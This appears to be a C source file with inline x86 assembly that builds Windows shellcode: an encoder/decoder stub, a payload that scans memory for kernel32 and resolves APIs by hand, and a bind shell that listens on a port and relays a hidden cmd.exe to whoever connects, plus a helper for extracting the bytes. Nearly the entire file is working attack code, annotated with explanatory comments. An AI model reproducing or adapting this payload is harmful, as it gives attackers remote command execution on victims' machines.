void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
/* NOP run that main() searches for to locate the short assembly sequence below */
jmp next
getediadd: pop EDI
/* EDI = return address of the call = first encoded byte */
push EDI
pop ESI
/* ESI = EDI: decode in place, the read cursor runs ahead of the write cursor */
xor ecx,ecx
mov cx,0x0fd0
/* number of bytes to process */
looplock: lodsb
cmp al,0x30
/* '0' is the escape prefix produced by main()'s encoder */
jnz sto
lodsb
sub al,0x40
/* escaped byte: the following byte minus 0x40 is the real value */
sto: stosb
loop looplock
jmp shell
next: call getediadd
/* decode the shellcode */
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
} /* the shellcode that does the real work */
/* 本shellcode实现开端口绑定cmd.exe 的功能 */
/*
 * Payload body. Written as C so the compiler produces the bytes; main() copies
 * them out of the function and ships them, so nothing here may rely on imports
 * or on a data section. Steps:
 *   1. install a temporary exception handler so probing an unmapped page during
 *      the module scan does not terminate the process,
 *   2. scan memory for the kernel32 image by its MZ/PE headers and pull
 *      GetProcAddress out of its export table,
 *   3. resolve the API names from the string block main() appended after the
 *      code (stradd points at it),
 *   4. bind a listening socket and relay between it and a hidden cmd.exe
 *      through two pipes (the original comment: a port-binding cmd.exe).
 * The FARPROC locals mainly reserve stack slots; they are filled through
 * apifnadd[] (see the resolve loop).
 */
void shellcodefn()
{ char Buff[0x800];
int *except[3];            /* hand-built SEH record: [0]=next, [1]=handler, [2]=saved fs:[0] */
FARPROC closesocketadd;
FARPROC ioctlsocketadd;
FARPROC recvadd;
FARPROC sendadd;
FARPROC acceptadd;
FARPROC listenadd;
FARPROC bindadd;
FARPROC socketadd;
/* FARPROC WSAStartupadd; */
FARPROC NOPNOP;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;      /* GetProcAddress once found; 0 means not found */
char *stradd;              /* cursor into the appended string block */
int imgbase,fnbase,k,l;
HANDLE libhandle;
STARTUPINFO siinfo;
SOCKET listenFD,clientFD;
struct sockaddr_in server;
int iAddrSize = sizeof(server);
int lBytesRead;
u_short shellcodeport;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
SECURITY_ATTRIBUTES sa;
/*
 * The call/pop at nextcall (asm trailer at the end of the function) loads
 * stradd with the address of the bytes after that call, where main() placed
 * the string block. Then except[] is linked in at the head of the SEH chain
 * (fs:[0]); the previous head is saved in except[2].
 */
_asm { jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;      /* end-of-chain marker in the "next" slot */
except[1]=stradd-0x07;     /* handler = execptprogram, 7 bytes before the string block */
imgbase=0x77e00000;        /* scan start; advanced in 64 KiB steps below */
/*
 * Records the address of the loop that follows as the handler's resume point:
 * getexceptretadd patches it into errprogram's immediate operand.
 */
_asm{
call getexceptretadd
}
/*
 * NOTE(review): because of the comma operator only procgetadd==0 is the loop
 * condition; the imgbase<0xbffa0000 bound is evaluated and discarded.
 */
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;   /* presumably skips to the win9x kernel32 range */
/* 'ZM' / 'EP' are the little-endian "MZ" and "PE" signatures; +0x3c is e_lfanew */
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){
/* export directory RVA: DataDirectory[0] at +0x78 from the PE signature */
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;          /* export Name RVA -> module name string */
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){   /* "KERNEL32" */
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);         /* AddressOfNames */
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){   /* NumberOfNames */
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int
*)k)=='Acor'){                           /* "GetProcA" */
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));   /* AddressOfNameOrdinals[l] */
k+=*(int *)(fnbase+0x10)-1;              /* + Base - 1 (zero for the usual Base of 1) */
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));   /* AddressOfFunctions[k] */
procgetadd=k+imgbase;
break;
}
}
}
}
}
/*
 * Search for the KERNEL32.DLL module address and the address of the API
 * GetProcAddress. Note that the case of a scanned page not being present is
 * handled here (by the temporary exception handler).
 */
/* unlink the temporary handler: restore the saved fs:[0] */
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
} if(procgetadd==0) goto die ;
shellcodeport=*(u_short *)stradd;   /* first two bytes of the block: listen port, network order */
stradd+=2;
/*
 * Resolve the 16 NUL-separated names in order. Entry 8 is a DLL name handed
 * to LoadLibraryA (resolved as entry 1) and the later names are looked up in
 * that module. apifnadd has one element, so apifnadd[k] for k>=1 lands on the
 * FARPROC locals declared above it -- this presumably relies on MSVC placing
 * them contiguously in declaration order, so that apifnadd[1]==procloadlib up
 * to apifnadd[16]==closesocketadd, with apifnadd[8]==NOPNOP unused.
 */
for(k=1;k<17;++k) {
if(k==8) libhandle=procloadlib(stradd);
else apifnadd[k]=procgetadd(libhandle,stradd);
/* advance to the byte after this name's terminating NUL */
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}
/* WSAStartupadd(MAKEWORD(1, 1), &wsaData); */
listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port =shellcodeport;
server.sin_addr.s_addr=0;          /* any local address */
k=1;
/* bind; on failure bump the (network-order) port value and retry until it succeeds */
while(k!=0){
k=bindadd(listenFD,&server,sizeof(server));
server.sin_port+=0x100;
if(server.sin_port<0x100) ++server.sin_port;
}
listenadd(listenFD,10);
/* one client at a time: a fresh cmd.exe is spawned per accepted connection */
while(1){
clientFD=acceptadd(listenFD,&server,&iAddrSize);
sa.nLength=12;                     /* sizeof(SECURITY_ATTRIBUTES) */
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;            /* pipe handles must be inheritable by the child */
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);   /* child stdout/stderr -> hReadPipe1 */
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);   /* hWritePipe2 -> child stdin */
/* ZeroMemory(&siinfo,sizeof(siinfo)); */
/* inline ZeroMemory: 0x11 dwords = 68 bytes = sizeof(STARTUPINFO) */
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
/* stradd now points at the command line ("cmd.exe"); handles are inherited */
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
/*
k=1;
ioctlsocketadd(clientFD, FIONBIO, &k);
*/
/*
 * Blocking mode is preferable: it uses less CPU time; otherwise the loop below
 * would keep spinning once the connection dies and make the attacked system
 * sluggish.
 */
/* relay loop: pipe output -> socket, socket input -> pipe (echoed back) */
while(1){
PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if(lBytesRead>0) {
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0);
else sendadd(clientFD,stradd,8,0);   /* the 8 bytes at stradd ("cmd.exe\0") */
}
else{
lBytesRead=recvadd(clientFD,Buff,1024,0);
if(lBytesRead<=0){
lBytesRead=6;
WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0);   /* "exit\r\n" to the child */
closesocketadd(clientFD);
break;
/*
 * The TELNET connection dropped: leave and wait for the next connection.
 */ }
else{
sendadd(clientFD,Buff,lBytesRead,0);
/*
 * Echo: some TELNET clients cannot enable local echo, which makes typing
 * commands inconvenient.
 */
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
}
}
}
} die: goto die ;   /* never returns; spins here forever */
/*
 * Helpers reached only via the call/jmp instructions above. Their byte layout
 * is what the offsets quoted below rely on (stradd = address after the final
 * call):
 *   getexceptretadd - stores its own return address (the scan loop) into the
 *                     0x11223344 immediate, which lives at stradd-0xe;
 *   errprogram      - the exception handler: eax = CONTEXT* (3rd argument, at
 *                     [esp+0xc]); CONTEXT.Eip (+0xb8) is set to that stored
 *                     address and eax=0 (ExceptionContinueExecution) is
 *                     returned, so the faulting probe is retried at the loop;
 *   execptprogram   - the entry the SEH record points at (stradd-7);
 *   nextcall        - the call whose pushed return address becomes stradd; the
 *                     trailing NOP run is the end marker main() looks for and
 *                     is replaced by the string block.
 */
_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344
/* stradd-0xe */
xor eax,eax
/* 2 bytes */
ret
/* 1 bytes */
execptprogram: jmp errprogram
/* 2 bytes stradd-7 */
nextcall: call getstradd
/* 5 bytes */
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
} /*
remove the _chkesp calls from the shellcode
*/
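/*
 * Patch every "call _chkesp" out of a copied function body.
 *
 * The copied payload must not reference _chkesp (the stack-pointer check whose
 * address main() resolves), so each call to it is replaced by five bytes that
 * change nothing of consequence: nop, inc ebx, dec ebx, inc ebx, dec ebx.
 *
 * fnadd     address the bytes were originally copied from; call displacements
 *           are relative to that location, so targets are resolved against it
 * shellbuff the copied bytes, patched in place
 * chkesp    resolved address of _chkesp
 * len       number of valid bytes in shellbuff
 *
 * Only a complete five-byte call (0xe8 + rel32) lying entirely within len is
 * examined; an 0xe8 in the last four bytes is left alone, so neither the
 * rel32 read nor the patch touches bytes past len (the original read the
 * operand unconditionally).
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
    int i;
    int rel;
    char *calladd;
    for (i = 0; i + 5 <= len; ++i) {
        /* compare as unsigned: plain char may be signed */
        if ((unsigned char)shellbuff[i] != 0xe8) {
            continue;
        }
        /* rel32 operand; memcpy avoids an unaligned int load */
        memcpy(&rel, shellbuff + i + 1, sizeof rel);
        /* call target = address of the byte after the call + displacement */
        calladd = fnadd + i + 5 + rel;
        if (calladd == chkesp) {
            shellbuff[i] = (char)0x90;   /* nop */
            shellbuff[i + 1] = 0x43;     /* inc ebx */
            shellbuff[i + 2] = 0x4b;     /* dec ebx */
            shellbuff[i + 3] = 0x43;     /* inc ebx */
            shellbuff[i + 4] = 0x4b;     /* dec ebx */
        }
    }
}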